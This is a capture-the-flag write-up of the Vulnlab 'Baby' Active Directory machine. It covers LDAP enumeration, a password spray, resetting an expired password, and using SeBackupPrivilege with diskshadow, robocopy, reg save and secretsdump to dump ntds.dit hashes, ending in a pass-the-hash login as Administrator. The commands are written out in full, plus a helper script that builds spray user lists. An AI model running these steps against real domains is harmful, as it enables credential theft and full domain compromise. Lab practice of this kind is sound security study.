Baby


Baby is an Active Directory machine by xct on Vulnlab. The path is LDAP enumeration for an initial credential, then abuse of a backup privilege to retrieve the domain database (ntds.dit) for hash dumping and a pass-the-hash login as Administrator.


Enumeration

Start an nmap scan to look for open ports, adding the flags needed for in-depth enumeration (service and script scanning).

From the scan we note the domain name (baby.vl) and start null-session enumeration.

After trying null-session enumeration against SMB and RPC, it is LDAP (anonymous bind) that gives useful information about the domain.

ldapsearch -x -H ldap://10.10.124.116 -b "dc=baby,dc=vl"

ldapsearch returns a lot of data; filter it down to just the usernames and their descriptions, because sysadmins sometimes leave default passwords in the description field.

I did a password check for the Teresa.Bell user, as stated in the ldapsearch results, but it was the wrong password.

With the users found in ldapsearch, I created a user list and did a password spray.

The Caroline.Robinson user comes back with STATUS_PASSWORD_MUST_CHANGE: the password is valid, but it has expired and must be changed before the account can be used.
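The filtering described above (usernames plus descriptions, then a user list for the spray) is easy to get wrong with a plain grep, because LDIF folds long values onto continuation lines that start with a space and base64-encodes values written as `attr:: value`. The script below is an added example, not code from the original writeup; it parses ldapsearch output correctly and skips computer accounts (names ending in `$`). The embedded LDIF is a constructed sample with placeholder users (Jane.Doe, John.Roe), not real output from baby.vl, and it assumes `base64 -d` from coreutils.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): parse ldapsearch LDIF output
# into "user<TAB>description" pairs so default passwords left in descriptions
# stand out, and derive a spray user list from it.
# Two LDIF details break a naive grep: a line starting with a space continues
# the previous attribute, and "attr:: value" means the value is base64.
# Real input would come from, e.g.:
#   ldapsearch -x -H ldap://10.10.124.116 -b "dc=baby,dc=vl" \
#       "(objectClass=user)" sAMAccountName description | ldif_users_and_descriptions

# Join folded continuation lines back onto the attribute they belong to.
ldif_unfold() {
  awk '/^ /   { printf "%s", substr($0, 2); next }   # continuation: append, no newline
       NR > 1 { printf "\n" }                          # newline before every other line
              { printf "%s", $0 }
       END    { printf "\n" }'
}

# Print "user<TAB>description" unless the name is empty or a computer account ($).
emit_user() {
  case "$1" in ""|*'$') ;; *) printf '%s\t%s\n' "$1" "$2" ;; esac
}

# Walk the unfolded LDIF entry by entry (entries are separated by blank lines).
ldif_users_and_descriptions() {
  ldif_unfold | {
    sam="" desc=""
    while IFS= read -r line; do
      case "$line" in
        "")                   emit_user "$sam" "$desc"; sam="" desc="" ;;
        "sAMAccountName: "*)  sam=${line#sAMAccountName: } ;;
        "description: "*)     desc=${line#description: } ;;
        "description:: "*)    desc=$(printf '%s' "${line#description:: }" | base64 -d) ;;
      esac
    done
    emit_user "$sam" "$desc"   # last entry has no trailing blank line
  }
}

# Just the account names, one per line, ready for a password spray.
ldif_userlist() { ldif_users_and_descriptions | cut -f1; }

# Constructed sample, NOT real data from baby.vl: placeholder users, a folded
# description, a base64 description (its trailing space forces base64), and a
# computer account that must be skipped.
SAMPLE_LDIF='# Jane Doe, it, baby.vl
dn: CN=Jane Doe,OU=it,DC=baby,DC=vl
objectClass: user
description: Set initial password to Welcome
 123!
sAMAccountName: Jane.Doe

# John Roe, dev, baby.vl
dn: CN=John Roe,OU=dev,DC=baby,DC=vl
objectClass: user
sAMAccountName: John.Roe
description:: VGVtcCBwdzogV2ludGVyMjAyNCA=

# DC, Domain Controllers, baby.vl
dn: CN=DC,OU=Domain Controllers,DC=baby,DC=vl
objectClass: computer
sAMAccountName: DC$'

printf '%s\n' "$SAMPLE_LDIF" | ldif_users_and_descriptions
printf '%s\n' "$SAMPLE_LDIF" | ldif_userlist
```

Requesting only `sAMAccountName` and `description` in the ldapsearch call keeps the output small; the parser still has to unfold and decode, because ldapsearch folds at roughly 76 columns and base64-encodes any value with leading or trailing whitespace or non-ASCII characters, which is exactly where a pasted password can hide.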


Initial Foothold

Use impacket-smbpasswd to change the user's password; the password-change operation is accepted even though the current password has expired.

impacket-smbpasswd baby.vl/Caroline.Robinson:'BabyStart123!'@10.10.127.109 -newpass 'Password123!'

With the new credentials, repeat the enumeration as an authenticated user (LDAP, SMB, RPC, etc.).

Check for remote access such as RDP and WinRM.

We can WinRM in as this user.

Once on the machine, enumerating the account's privileges shows that it holds SeBackupPrivilege.

SeBackupPrivilege exists so that backup software can read every file regardless of its ACL; a holder who opens files in backup mode gets read access to the whole file system. From an attacker's viewpoint, a foothold with this privilege is enough to copy out protected files such as the SAM or, on a domain controller, the NTDS database together with the SYSTEM hive, and to extract the hashes of high-privilege accounts, which can then be cracked or used directly.


Privilege Escalation

There are two ways to use this privilege: on a standalone (or ordinary domain-joined) machine you save the SAM and SYSTEM hives and dump the local accounts; on a domain controller the domain accounts live in ntds.dit, and the local SAM only holds the DSRM account, so the "Administrator" hash it yields is not the domain Administrator's.

I made the mistake of using the standalone method and retrieved the wrong hashes for Administrator.


The method that works on a domain controller is the following.

Use diskshadow to create a Volume Shadow Copy of the C: drive; ntds.dit is held open by the directory service while the DC is running, so it cannot be copied from the live volume even with backup privileges.

First, we need to create a .dsh file on our local machine.

set context persistent nowriters
add volume c: alias persecure
create
expose %persecure% z:

Convert it to DOS (CRLF) line endings, since diskshadow expects them.

unix2dos diskshadow.dsh

Upload the .dsh to the victim machine and run it with diskshadow.

diskshadow /s diskshadow.dsh

Use robocopy in backup mode (/b) to copy ntds.dit from the exposed Z: drive into the current directory (here C:\Temp).

robocopy /b z:\windows\ntds . ntds.dit

Then save the SYSTEM hive, which holds the boot key needed to decrypt the hashes in ntds.dit.

reg save hklm\system c:\Temp\system

Transfer both files to your local machine, either with evil-winrm's download function or via an SMB server.

Use impacket-secretsdump on the two files to extract the domain hashes.

Use evil-winrm with the Administrator NT hash (pass-the-hash) to gain access.

And we have a shell as Administrator.
